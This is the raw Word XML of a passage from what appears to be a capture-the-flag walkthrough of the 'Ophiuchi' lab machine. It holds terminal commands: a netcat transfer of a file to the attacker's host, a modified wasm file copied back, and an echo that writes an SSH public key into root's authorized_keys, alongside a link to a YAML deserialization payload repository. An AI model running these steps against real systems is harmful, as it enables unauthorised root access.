      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-functions/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>main.wasm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="003D21C8" w:rsidRDefault="006E772A" w:rsidP="003E2989">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E772A">
        <w:t>admin@ophiuchi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E772A">
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E772A">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E772A">
        <w:t xml:space="preserve">/work$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E772A">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E772A">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E772A">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E772A">
        <w:t>/bin/go run /opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E772A">
        <w:t>wasm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E772A">
        <w:t>-functions/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E772A">
        <w:t>index.go</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006E772A" w:rsidRDefault="00E72BF6" w:rsidP="003E2989">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E01BF7F" wp14:editId="6CAAEA37">
            <wp:extent cx="5731510" cy="3263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F6" w:rsidRDefault="00DA1A29" w:rsidP="003E2989">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA1A29">
        <w:t>root@osboxes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA1A29">
        <w:t>:~/Downloads/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA1A29">
        <w:t>yaml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA1A29">
        <w:t xml:space="preserve">-payload# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DA1A29">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DA1A29">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA1A29">
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA1A29">
        <w:t xml:space="preserve"> 1234 &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA1A29">
        <w:t>main.wasm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00DA1A29" w:rsidRDefault="00071698" w:rsidP="003E2989">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49F5CCE3" wp14:editId="79538451">
            <wp:extent cx="5731510" cy="46418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698" w:rsidRDefault="00071698" w:rsidP="003E2989"/>
    <w:p w:rsidR="00071698" w:rsidRDefault="00682CCC" w:rsidP="003E2989">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00682CCC">
        <w:t>admin@ophiuchi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00682CCC">
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00682CCC">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00682CCC">
        <w:t xml:space="preserve">/work$ cat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00682CCC">
        <w:t>main.wasm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00682CCC">
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00682CCC">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00682CCC">
        <w:t xml:space="preserve"> 10.10.14.16 1234</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00682CCC" w:rsidRDefault="00682CCC" w:rsidP="003E2989">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="067EADF4" wp14:editId="7DE1DDB5">
            <wp:extent cx="5372100" cy="285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CCC" w:rsidRDefault="00682CCC" w:rsidP="003E2989"/>
    <w:p w:rsidR="002F5B9E" w:rsidRDefault="00A1084D" w:rsidP="00026390">
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidR="002F5B9E" w:rsidRPr="004D63F2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://webassembly.github.io/wabt/demo/wasm2wat/index.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002F5B9E" w:rsidRDefault="00F765D8" w:rsidP="00026390">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51CD55E4" wp14:editId="0A2A9000">
            <wp:extent cx="5731510" cy="280860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D8" w:rsidRDefault="00F765D8" w:rsidP="00026390"/>
    <w:p w:rsidR="00F765D8" w:rsidRDefault="00A1084D" w:rsidP="00026390">
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidR="00540C19" w:rsidRPr="004D63F2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://webassembly.github.io/wabt/demo/wat2wasm/index.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00540C19" w:rsidRDefault="007541DA" w:rsidP="00026390">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BB4D596" wp14:editId="429B220A">
            <wp:extent cx="5731510" cy="3388995"/>
            <wp:effectExtent l="0" t="0" r="254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1DA" w:rsidRDefault="007541DA" w:rsidP="00026390"/>
    <w:p w:rsidR="00705A9D" w:rsidRDefault="00705A9D" w:rsidP="00026390">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00705A9D">
        <w:t>root@osboxes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00705A9D">
        <w:t xml:space="preserve">:~/Downloads# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00705A9D">
        <w:t>cp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00705A9D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00705A9D">
        <w:t>test.wasm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00705A9D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00705A9D">
        <w:t>main.wasm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00705A9D" w:rsidRDefault="00041BD7" w:rsidP="00026390">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46D27F1F" wp14:editId="792BD7D7">
            <wp:extent cx="4391025" cy="3048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863" w:rsidRDefault="00962863" w:rsidP="00026390"/>
    <w:p w:rsidR="007541DA" w:rsidRDefault="00CD3C39" w:rsidP="00026390">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD3C39">
        <w:t>root@osboxes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD3C39">
        <w:t xml:space="preserve">:~/Downloads# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD3C39">
        <w:t>scp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD3C39">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD3C39">
        <w:t>main.wasm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD3C39">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId35" w:history="1">
        <w:r w:rsidRPr="004D63F2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>admin@ophiuchi.htb:/tmp/work</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00CD3C39" w:rsidRDefault="00CD3C39" w:rsidP="00026390">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B1345D9" wp14:editId="637CE622">
            <wp:extent cx="5731510" cy="619760"/>
            <wp:effectExtent l="0" t="0" r="254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C39" w:rsidRDefault="00CD3C39" w:rsidP="00026390"/>
    <w:p w:rsidR="006E7EE8" w:rsidRDefault="006E7EE8" w:rsidP="00026390">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E7EE8">
        <w:t>root@osboxes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E7EE8">
        <w:t xml:space="preserve">:~/Downloads# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E7EE8">
        <w:t>ssh-keygen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006E7EE8" w:rsidRDefault="006E7EE8" w:rsidP="00026390">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AD29DD6" wp14:editId="61D1DB14">
            <wp:extent cx="5731510" cy="364744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EE8" w:rsidRDefault="006E7EE8" w:rsidP="00026390"/>
    <w:p w:rsidR="00B809B7" w:rsidRDefault="003D5810" w:rsidP="00026390">
      <w:r w:rsidRPr="003D5810">
        <w:t>echo "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D5810">
        <w:t>ssh-rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D5810">
        <w:t xml:space="preserve"> AAAAB3NzaC1yc2EAAAADAQABAAABAQDvqChvcSz6rYFdxAqmgvFzTF5f6XYM05Gg21FzfiuU7MyUNj4Ak2FyxbtKZv01YoD91EetadIbhc/6pRS7Bu37j8lxsV1NjdaKewvsw0JCHfzqqghdYeNC0zHLZBrlfdb6AGGUMgYc3zTK/7mSc2X5vwRtcIMKYgwBB7x5JWH/b2t0SbVSpQRzPYpE4RwA/coPsbzY1BIJjuLk/Pv39M04WiDbG3nKVMmP+RyozKPwzp2C2FMjBXCfj7lPe/0NHb2Qr1F5XCwHoEzAVE0uGXvjyLtyKMJlMbagJO63NG5WCFUonwfF7UpOeZR43VdxzG2lT4XfwxawOMMcJPJAoluF </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D5810">
        <w:t>root@osboxes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D5810">
        <w:t>" &gt; /root/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D5810">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D5810">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D5810">
        <w:t>authorized_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0085623F" w:rsidRDefault="0085623F" w:rsidP="00026390"/>
    <w:p w:rsidR="0085623F" w:rsidRDefault="00D107C0" w:rsidP="00026390">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D53DBDC" wp14:editId="2DE03EAC">
            <wp:extent cx="5731510" cy="1439186"/>
            <wp:effectExtent l="0" t="0" r="254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7244" cy="144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7C0" w:rsidRDefault="00D107C0" w:rsidP="00026390"/>
    <w:p w:rsidR="00D107C0" w:rsidRDefault="00567A2F" w:rsidP="00026390">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567A2F">
        <w:lastRenderedPageBreak/>
        <w:t>admin@ophiuchi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567A2F">
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567A2F">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567A2F">
        <w:t xml:space="preserve">/work$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567A2F">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567A2F">
        <w:t xml:space="preserve"> -u root /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567A2F">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567A2F">
        <w:t>/bin/go run /opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567A2F">
        <w:t>wasm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00567A2F">
        <w:t>-functions/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00567A2F">
        <w:t>index.go</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00567A2F" w:rsidRDefault="00567A2F" w:rsidP="00026390">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23105C6F" wp14:editId="022B372C">
            <wp:extent cx="5731510" cy="36258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A2F" w:rsidRDefault="00567A2F" w:rsidP="00026390"/>
    <w:p w:rsidR="00EF7089" w:rsidRDefault="00EF7089" w:rsidP="00026390">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A42C810" wp14:editId="288CA331">
            <wp:extent cx="5731510" cy="2984500"/>
            <wp:effectExtent l="0" t="0" r="254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89" w:rsidRDefault="00EF7089" w:rsidP="00026390"/>
    <w:p w:rsidR="00EF7089" w:rsidRDefault="00AC71CC" w:rsidP="00026390">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AE5C991" wp14:editId="3AB3B17D">
            <wp:extent cx="2905125" cy="5619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C71CC" w:rsidRDefault="00AC71CC" w:rsidP="00026390"/>
    <w:p w:rsidR="00B809B7" w:rsidRDefault="00B809B7" w:rsidP="00026390"/>
    <w:p w:rsidR="006E7EE8" w:rsidRDefault="006E7EE8" w:rsidP="00026390"/>
    <w:p w:rsidR="00E80EEC" w:rsidRDefault="00E80EEC" w:rsidP="00026390"/>
    <w:p w:rsidR="00E80EEC" w:rsidRDefault="00E80EEC" w:rsidP="00026390"/>
    <w:p w:rsidR="006E7EE8" w:rsidRDefault="006E7EE8" w:rsidP="00026390"/>
    <w:p w:rsidR="006E7EE8" w:rsidRDefault="006E7EE8" w:rsidP="00026390"/>
    <w:sectPr w:rsidR="006E7E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912"/>
    <w:rsid w:val="00026390"/>
    <w:rsid w:val="00041BD7"/>
    <w:rsid w:val="000514F3"/>
    <w:rsid w:val="000701CF"/>
    <w:rsid w:val="00071698"/>
    <w:rsid w:val="00085409"/>
    <w:rsid w:val="00141429"/>
    <w:rsid w:val="001F748C"/>
    <w:rsid w:val="002140E9"/>
    <w:rsid w:val="00224AEA"/>
    <w:rsid w:val="00281A76"/>
    <w:rsid w:val="002B0029"/>
    <w:rsid w:val="002C0DC5"/>
    <w:rsid w:val="002F5B9E"/>
    <w:rsid w:val="00332ECC"/>
    <w:rsid w:val="00345A6B"/>
    <w:rsid w:val="0035462F"/>
    <w:rsid w:val="003C3A79"/>
    <w:rsid w:val="003D21C8"/>
    <w:rsid w:val="003D5810"/>
    <w:rsid w:val="003D5A21"/>
    <w:rsid w:val="003E2989"/>
    <w:rsid w:val="003E7F40"/>
    <w:rsid w:val="00404844"/>
    <w:rsid w:val="004C14D7"/>
    <w:rsid w:val="004C1EB3"/>
    <w:rsid w:val="004F5912"/>
    <w:rsid w:val="00540C19"/>
    <w:rsid w:val="00567A2F"/>
    <w:rsid w:val="00581A92"/>
    <w:rsid w:val="00590661"/>
    <w:rsid w:val="005E66F0"/>
    <w:rsid w:val="006122B6"/>
    <w:rsid w:val="00667A94"/>
    <w:rsid w:val="00682CCC"/>
    <w:rsid w:val="006A1563"/>
    <w:rsid w:val="006D5BD5"/>
    <w:rsid w:val="006E772A"/>
    <w:rsid w:val="006E7EE8"/>
    <w:rsid w:val="006F08ED"/>
    <w:rsid w:val="00705A9D"/>
    <w:rsid w:val="00725E00"/>
    <w:rsid w:val="007412C4"/>
    <w:rsid w:val="007541DA"/>
    <w:rsid w:val="007C221E"/>
    <w:rsid w:val="007E041B"/>
    <w:rsid w:val="007E358E"/>
    <w:rsid w:val="0085623F"/>
    <w:rsid w:val="00962863"/>
    <w:rsid w:val="00984076"/>
    <w:rsid w:val="009C64F9"/>
    <w:rsid w:val="00A1084D"/>
    <w:rsid w:val="00A108C2"/>
    <w:rsid w:val="00A61E22"/>
    <w:rsid w:val="00AB127D"/>
    <w:rsid w:val="00AB50F3"/>
    <w:rsid w:val="00AC71CC"/>
    <w:rsid w:val="00B66743"/>
    <w:rsid w:val="00B809B7"/>
    <w:rsid w:val="00B9377D"/>
    <w:rsid w:val="00BD6A54"/>
    <w:rsid w:val="00BF0230"/>
    <w:rsid w:val="00C05695"/>
    <w:rsid w:val="00C61628"/>
    <w:rsid w:val="00C934F7"/>
    <w:rsid w:val="00CD3C39"/>
    <w:rsid w:val="00CD44CE"/>
    <w:rsid w:val="00D107C0"/>
    <w:rsid w:val="00D861DF"/>
    <w:rsid w:val="00DA1A29"/>
    <w:rsid w:val="00E37CDD"/>
    <w:rsid w:val="00E53478"/>
    <w:rsid w:val="00E72BF6"/>
    <w:rsid w:val="00E80EEC"/>
    <w:rsid w:val="00EF7089"/>
    <w:rsid w:val="00F765D8"/>
    <w:rsid w:val="00FB3A4D"/>
    <w:rsid w:val="00FD1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D8FABB-1512-492F-B9AF-2DFB3B706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1E22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546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462F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5462F"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ex">
    <w:name w:val="ex"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0035462F"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="at">
    <w:name w:val="at"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0035462F"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ot">
    <w:name w:val="ot"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00BD6A54"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="kw">
    <w:name w:val="kw"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00BD6A54"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="st">
    <w:name w:val="st"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00BD6A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451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2.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.10.227:8080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hyperlink" Target="https://webassembly.github.io/wabt/demo/wat2wasm/index.html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hyperlink" Target="mailto:admin@10.10.10.227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image" Target="media/image1.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/artsploit/yaml-payload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hyperlink" Target="https://webassembly.github.io/wabt/demo/wasm2wat/index.html" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:admin@ophiuchi.htb:/tmp/work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1</Pages>
  <Words>411</Words>
  <Characters>2348</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>19</Lines>
  <Paragraphs>5</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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saksham dixit</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>saksham dixit</cp:lastModifiedBy>
  <cp:revision>129</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-02T04:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-02T14:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>